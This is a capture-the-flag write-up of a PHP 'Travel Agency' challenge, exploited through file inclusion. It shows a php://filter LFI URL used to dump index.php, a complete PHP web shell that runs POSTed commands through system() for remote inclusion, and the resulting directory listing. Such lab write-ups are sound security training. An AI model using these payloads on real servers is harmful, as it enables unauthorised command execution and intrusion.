Travel Agency
LFI + RFI
Description
A travel agency website that lets users explore destinations from all over the world. The dev team recently added a ""preview template"" feature that dynamically loads different pages based on user selection.
Everything looks smooth on the surface, but a careless implementation might have left the site vulnerable to more than just wanderlust...
Can you dig into the source and go on a remote adventure to retrieve the flag?Homepage
After clicking on other page, there were no dynamic output for our input, although I noticed the page was loading using ?page parameter, which made me think for LFI.
I pulled index.php code using base64 filter, as it was LFI and not file disclosure. If it were to be file disclosure, we could've pulled index.php without base64 as that way the server wouldn't have executed PHP code.
http://13.201.125.136:54827/index.php?page=php://filter/convert.base64-encode/resource=index.php
Here's the vulnerable logic, it's using include of php.
If we see Example 3 of above mannual, it tells we can use include() to get/load pages via HTTP as well.
RFI
<html>
<body>
# SNIPPED
<h2>Execute Command</h2>
<form method="POST">
<input type="text" name="cmd" placeholder="Input command..." autocomplete="off" required>
<input type="submit" value="Run">
</form>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$cmd = $_POST["cmd"];
echo "<h3>Output:</h3><pre>";
system($cmd);
echo "</pre>";
}
?>
</body>
</html>
total 24
drwxrwxrwx 1 www-data www-data 34 Jun 27 10:07 .
drwxr-xr-x 1 root root 18 Jun 27 10:07 ..
-rw-r--r-- 1 root root 113 Jun 27 10:05 S3cRetP4g329658.html
-rw-r--r-- 1 root root 800 Jun 27 07:19 flights.php
-rw-r--r-- 1 root root 263 Jun 27 07:19 home.php
-rw-r--r-- 1 root root 761 Jun 27 07:19 hotels.php
-rw-r--r-- 1 root root 2059 Jun 27 07:19 index.php
-rw-r--r-- 1 root root 572 Jun 27 07:19 tours.php
_________________________heapbytes' still pwning.
Last updated